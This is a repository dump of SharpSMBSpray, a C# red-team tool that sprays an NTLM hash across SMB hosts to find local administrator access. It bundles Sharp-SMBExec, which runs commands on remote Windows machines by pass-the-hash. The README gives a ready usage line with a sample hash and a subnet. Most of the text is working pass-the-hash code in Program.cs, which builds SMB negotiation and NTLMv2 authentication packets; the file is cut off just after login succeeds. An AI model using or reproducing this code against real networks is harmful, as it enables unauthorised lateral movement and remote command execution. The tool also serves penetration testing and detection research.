Repository: rvrsh3ll/SharpSMBSpray
Branch: main
Commit: 612cbde4538a
Files: 41
Total size: 229.9 KB
Directory structure:
gitextract_suu4eg2e/
├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── Sharp-SMBExec/
│ ├── .gitattributes
│ ├── .gitignore
│ ├── README.md
│ ├── SharpInvoke-SMBExec/
│ │ ├── App.config
│ │ ├── ArgParse.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SMBExec.cs
│ │ ├── SharpInvoke-SMBExec.csproj
│ │ ├── Utilities.cs
│ │ └── packages.config
│ └── SharpInvoke-SMBExec.sln
└── SharpSMBSpray/
├── SharpSMBSpray/
│ ├── FodyWeavers.xml
│ ├── FodyWeavers.xsd
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ ├── SharpSMBSpray.csproj
│ └── packages.config
├── SharpSMBSpray.sln
└── packages/
├── Costura.Fody.4.1.0/
│ ├── .signature.p7s
│ ├── Costura.Fody.4.1.0.nupkg
│ ├── build/
│ │ └── Costura.Fody.props
│ ├── lib/
│ │ └── net40/
│ │ └── Costura.xml
│ └── weaver/
│ └── Costura.Fody.xcf
├── Fody.6.0.0/
│ ├── .signature.p7s
│ ├── Fody.6.0.0.nupkg
│ ├── build/
│ │ └── Fody.targets
│ ├── netclassictask/
│ │ ├── Mono.Cecil.Pdb.pdb
│ │ ├── Mono.Cecil.Rocks.pdb
│ │ └── Mono.Cecil.pdb
│ └── netstandardtask/
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.pdb
│ └── Mono.Cecil.pdb
├── IPNetwork.1.3.2.0/
│ ├── .signature.p7s
│ └── IPNetwork.1.3.2.0.nupkg
└── NDesk.Options.0.2.1/
├── .signature.p7s
└── NDesk.Options.0.2.1.nupkg
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: .gitignore
================================================
.vs
*.user
[Dd]ebug/
[Rr]elease/
[Bb]in/
[Oo]bj/
================================================
FILE: LICENSE
================================================
BSD 3-Clause License
Copyright (c) 2021, rvrsh3ll
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.md
================================================
# SharpSMBSpray
Spray a hash via smb to check for local administrator access
## Example
execute-assembly /home/tester/Desktop/SharpSMBSpray.exe 192.168.1.0/24 Administrator 5A31C53A49CEEF591E8961D7ACCD2847
================================================
FILE: Sharp-SMBExec/.gitattributes
================================================
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto
###############################################################################
# Set default behavior for command prompt diff.
#
# This is need for earlier builds of msysgit that does not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs diff=csharp
###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary
###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary
###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain
================================================
FILE: Sharp-SMBExec/.gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
[Xx]64/
[Xx]86/
[Bb]uild/
bld/
[Bb]in/
[Oo]bj/
# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# DNX
project.lock.json
artifacts/
*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Un-comment the next line if you do not want to checkin
# your web deploy settings because they may include unencrypted
# passwords
#*.pubxml
*.publishproj
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produces more ignoreable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Microsoft Azure ApplicationInsights config file
ApplicationInsights.config
# Windows Store app package directory
AppPackages/
BundleArtifacts/
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.pfx
*.publishsettings
node_modules/
orleans.codegen.cs
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
*.mdf
*.ldf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# LightSwitch generated files
GeneratedArtifacts/
ModelManifest.xml
# Paket dependency manager
.paket/paket.exe
# FAKE - F# Make
.fake/
================================================
FILE: Sharp-SMBExec/README.md
================================================
# Sharp-SMBExec
A native C# conversion of Kevin Robertsons Invoke-SMBExec powershell script. (https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1)
Built for .NET 3.5
# Usage
Sharp-SMBExec.exe hash:"hash" username:"username" domain:"domain.tld" target:"target.domain.tld" command:"command"
# Description
This Assembly will allow you to execute a command on a target machine using SMB by providing an NTLM hash for the specified user.
# Help
```
Option Description
username* Username to use for authentication
hash* NTLM Password hash for authentication. This module will accept either LM:NTLM or NTLM format
domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username
target Hostname or IP Address of the target.
command Command to execute on the target. If a command is not specified, the function will check to see if the username and hash provide local admin access on the target
ServiceName Default = 20 Character Random. The Name of the service to create and delete on the target.
-CheckAdmin Check admin access only, don't execute command
-Help (-h) Switch, Enabled debugging [Default='False']
-Debug Print Debugging Information along with output
-ForceSMB1 Force SMB1. The default behavior is to perform SMB Version negotiation and use SMB2 if it's supported by the target [Default='False']
-ComSpec Prepend %COMSPEC% /C to Command [Default='False']
```
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/App.config
================================================
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/ArgParse.cs
================================================
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace SharpInvoke_SMBExec
{
public static class ArgParse
{
//Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/)
//Author: @Harmj0y
public static ArgumentParserResult Parse(IEnumerable args)
{
var arguments = new Dictionary();
try
{
foreach (var argument in args)
{
var idx = argument.IndexOf(':');
if (idx > 0)
arguments[argument.Substring(0, idx).ToLower()] = argument.Substring(idx + 1);
else if (argument.ToLower() == "-debug")
arguments["debugging"] = "true";
else if (argument.ToLower() == "-h")
arguments["showhelp"] = "true";
else if (argument.ToLower() == "-help")
arguments["showhelp"] = "true";
else if (argument.ToLower() == "-checkadmin")
arguments["admincheck"] = "true";
else if (argument.ToLower() == "-forcesmb1")
arguments["forcesmb1"] = "true";
else if (argument.ToLower() == "-smb1")
arguments["forcesmb1"] = "true";
else if (argument.ToLower() == "-comspec")
arguments["comspec"] = "true";
else
arguments[argument] = string.Empty;
}
return ArgumentParserResult.Success(arguments);
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
return ArgumentParserResult.Failure();
}
}
}
public class ArgumentParserResult
{
public bool ParsedOk { get; }
public Dictionary Arguments { get; }
private ArgumentParserResult(bool parsedOk, Dictionary arguments)
{
ParsedOk = parsedOk;
Arguments = arguments;
}
public static ArgumentParserResult Success(Dictionary arguments)
=> new ArgumentParserResult(true, arguments);
public static ArgumentParserResult Failure()
=> new ArgumentParserResult(false, null);
}
}
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Program.cs
================================================
using System;
using System.Threading;
using System.Security.Cryptography;
using System.Diagnostics;
using System.Net.Sockets;
using System.Collections.Specialized;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace SharpInvoke_SMBExec
{
public class Program
{
public static void Main(string[] args)
{
string Target = args[0];
string username = args[1];
string domain = "";
string command = "";
string hash = args[2];
string ServiceName = "";
bool ForceSMB1 = false;
bool ComSpec = false;
int sleep = 15;
bool debug = false;
bool AdminCheck = true;
//Trackers
bool Login_Successful = false;
bool Service_Deleted = false;
bool SMBExec_Failed = false;
bool SMB_execute = false;
bool SMB_Signing = false;
string Output_Username;
string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-", "");
string[] processID2 = processID.Split('-');
StringBuilder output = new StringBuilder();
int SMB2_Message_ID = 0;
int SMB_Close_Service_Handle_Stage = 0;
int SMB_Split_Stage = 0;
int SMB_Split_Index_Tracker = 0;
double SMB_Split_Stage_final = 0;
//Communication
byte[] SMBClientReceive = null;
//Packet Reqs
byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID.ToString());
byte[] SMB_Session_ID = null;
byte[] Session_Key = null;
byte[] SMB_Session_Key_Length = null;
byte[] SMB_Negotiate_Flags = null;
byte[] SMB2_Tree_ID = null;
byte[] SMB_Client_Send = null;
byte[] SMB_FID = new byte[2];
byte[] SMB_Service_Manager_Context_Handle = null;
byte[] SMB_Service_Context_Handle = null;
byte[] SMB_Named_Pipe_Bytes = null;
byte[] SMB_File_ID = null;
byte[] SMB_User_ID = null;
byte[] SMB_Header = null;
byte[] SMB2_Header = null;
byte[] SMB_Data = null;
byte[] SMB2_Data = null;
byte[] NetBIOS_Session_Service = null;
byte[] NTLMSSP_Negotiate = null;
byte[] NTLMSSP_Auth = null;
byte[] SMB_Sign = null;
byte[] SMB_Signature = null;
byte[] SMB_Signature2 = null;
byte[] SMB2_Sign = null;
byte[] SMB2_Signature = null;
byte[] SMB_Signing_Sequence = null;
byte[] RPC_Data = null;
byte[] SCM_Data = null;
OrderedDictionary Packet_SMB_Header = null;
OrderedDictionary Packet_SMB2_Header = null;
OrderedDictionary Packet_SMB_Data = null;
OrderedDictionary Packet_SMB2_Data = null;
OrderedDictionary Packet_NTLMSSP_Negotiate = null;
OrderedDictionary Packet_NTLMSSP_Auth = null;
OrderedDictionary Packet_RPC_Data = null;
OrderedDictionary Packet_SCM_Data = null;
MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
Output_Username = username;
TcpClient SMBClient = new TcpClient();
SMBClient.Client.ReceiveTimeout = 60000;
try
{
SMBClient.Connect(Target, 445);
}
catch
{
//output.AppendLine("Could not connect to Target");
}
if (SMBClient.Connected)
{
if (debug) { output.AppendLine(String.Format("Connected to {0}", Target)); }
NetworkStream SMBClientStream = SMBClient.GetStream();
SMBClientReceive = new byte[1024];
string SMBClientStage = "NegotiateSMB";
while (SMBClientStage != "exit")
{
if (debug) { output.AppendLine(String.Format("Current Stage: {0}", SMBClientStage)); }
switch (SMBClientStage)
{
case "NegotiateSMB":
{
Packet_SMB_Header = new OrderedDictionary();
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x72 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
Packet_SMB_Data = SMBExec.SMBNegotiateProtocolRequest(ForceSMB1);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
{
ForceSMB1 = true;
if (debug) { output.AppendLine("Using SMB1"); }
SMBClientStage = "NTLMSSPNegotiate";
if (BitConverter.ToString(new byte[] { SMBClientReceive[39] }).ToLower() == "0f")
{
if (debug) { output.AppendLine("SMB Signing is Enabled"); }
SMB_Signing = true;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
}
else
{
if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
SMB_Signing = false;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x05, 0x82, 0x08, 0xa0 };
}
}
else
{
if (debug) { output.AppendLine("Using SMB2"); }
SMBClientStage = "NegotiateSMB2";
if (BitConverter.ToString(new byte[] { SMBClientReceive[70] }) == "03")
{
if (debug) { output.AppendLine("SMB Signing is Enabled"); }
SMB_Signing = true;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
}
else
{
if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
SMB_Signing = false;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
}
}
}
break;
case "NegotiateSMB2":
{
SMB2_Message_ID = 1;
Packet_SMB2_Header = new OrderedDictionary();
SMB2_Tree_ID = new byte[] { 0x00, 0x00, 0x00, 0x00 };
SMB_Session_ID = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x00, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Data = SMBExec.SMB2NegotiateProtocolRequest();
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "NTLMSSPNegotiate";
}
break;
case "NTLMSSPNegotiate":
{
SMB_Client_Send = null;
if (ForceSMB1)
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
}
Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
}
else
{
Packet_SMB2_Header = new OrderedDictionary();
SMB2_Message_ID += 1;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Negotiate);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
}
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "exit";
}
break;
}
}
if (debug) { output.AppendLine(String.Format("Authenticating to {0}", Target)); }
string SMB_NTLSSP = BitConverter.ToString(SMBClientReceive);
SMB_NTLSSP = SMB_NTLSSP.Replace("-", "");
int SMB_NTLMSSP_Index = SMB_NTLSSP.IndexOf("4E544C4D53535000");
int SMB_NTLMSSP_Bytes_Index = SMB_NTLMSSP_Index / 2;
int SMB_Domain_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 12, SMBClientReceive);
int SMB_Target_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 40, SMBClientReceive);
SMB_Session_ID = Utilities.GetByteRange(SMBClientReceive, 44, 51);
byte[] SMB_NTLM_challenge = Utilities.GetByteRange(SMBClientReceive, SMB_NTLMSSP_Bytes_Index + 24, SMB_NTLMSSP_Bytes_Index + 31);
byte[] SMB_Target_Details = null;
SMB_Target_Details = Utilities.GetByteRange(SMBClientReceive, (SMB_NTLMSSP_Bytes_Index + 56 + SMB_Domain_Length), (SMB_NTLMSSP_Bytes_Index + 55 + SMB_Domain_Length + SMB_Target_Length));
byte[] SMB_Target_Time_Bytes = Utilities.GetByteRange(SMB_Target_Details, SMB_Target_Details.Length - 12, SMB_Target_Details.Length - 5);
string hash2 = "";
for (int i = 0; i < hash.Length - 1; i += 2) { hash2 += (hash.Substring(i, 2) + "-"); };
byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
string Auth_Hostname = Environment.MachineName;
byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
HMACMD5 HMAC_MD5 = new HMACMD5();
HMAC_MD5.Key = NTLM_hash_bytes;
string Username_And_Target = username.ToUpper();
byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
Random r = new Random();
byte[] Client_Challenge_Bytes = new byte[8];
r.NextBytes(Client_Challenge_Bytes);
byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
.Concat(SMB_Target_Time_Bytes)
.Concat(Client_Challenge_Bytes)
.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
.Concat(SMB_Target_Details)
.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
byte[] Server_Challenge_And_Security_Blob_Bytes = Server_Challenge_And_Security_Blob_Bytes = SMB_NTLM_challenge.Concat(Security_Blob_Bytes).ToArray();
HMAC_MD5.Key = NTLMv2_hash;
byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
if (SMB_Signing)
{
byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
Session_Key = Session_Base_Key;
HMACSHA256 HMAC_SHA256 = new HMACSHA256();
HMAC_SHA256.Key = Session_Key;
}
NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
byte[] SMB_Session_Key_offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
.Concat(Auth_LM_Offset)
.Concat(NTLMv2_Response_Length)
.Concat(NTLMv2_Response_Length)
.Concat(Auth_NTLM_Offset)
.Concat(Auth_Domain_Length)
.Concat(Auth_Domain_Length)
.Concat(Auth_Domain_offset)
.Concat(Auth_Username_Length)
.Concat(Auth_Username_Length)
.Concat(Auth_Username_Offset)
.Concat(Auth_Hostname_Length)
.Concat(Auth_Hostname_Length)
.Concat(Auth_Hostname_Offset)
.Concat(SMB_Session_Key_Length)
.Concat(SMB_Session_Key_Length)
.Concat(SMB_Session_Key_offset)
.Concat(SMB_Negotiate_Flags)
.Concat(Auth_Domain_Bytes)
.Concat(Auth_Username_Bytes)
.Concat(Auth_Hostname_Bytes)
.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
.Concat(NTLMv2_Response).ToArray();
if (ForceSMB1)
{
Packet_SMB_Header = new OrderedDictionary();
SMB_User_ID = new byte[] { SMBClientReceive[32], SMBClientReceive[33] };
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
}
Packet_SMB_Header["SMBHeader_UserID"] = SMB_User_ID;
Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPAuth(NTLMSSP_response);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
}
else
{
SMB2_Message_ID += 1;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_NTLMSSP_Auth = SMBExec.NTLMSSPAuth(NTLMSSP_response);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
NTLMSSP_Auth = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Auth);
Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Auth);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
}
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (ForceSMB1)
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 9, 12)) == "00-00-00-00")
{
if (debug) { output.AppendLine("Authentication Successful"); }
Login_Successful = true;
}
else
{
output.AppendLine("Unable to authenticate to Target.");
Console.WriteLine(output.ToString());
}
}
else
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) == "00-00-00-00")
{
if (debug) { output.AppendLine("Authentication Successful"); }
Login_Successful = true;
}
else
{
output.AppendLine("Unable to Authenticate to Target.");
Console.WriteLine(output.ToString());
}
}
if (debug) { output.AppendLine(String.Format("Login Status: {0}", Login_Successful)); }
if (Login_Successful)
{
byte[] SMBExec_Command;
byte[] SMB_Path_Bytes;
string SMB_Path = "\\\\" + Target + "\\IPC$";
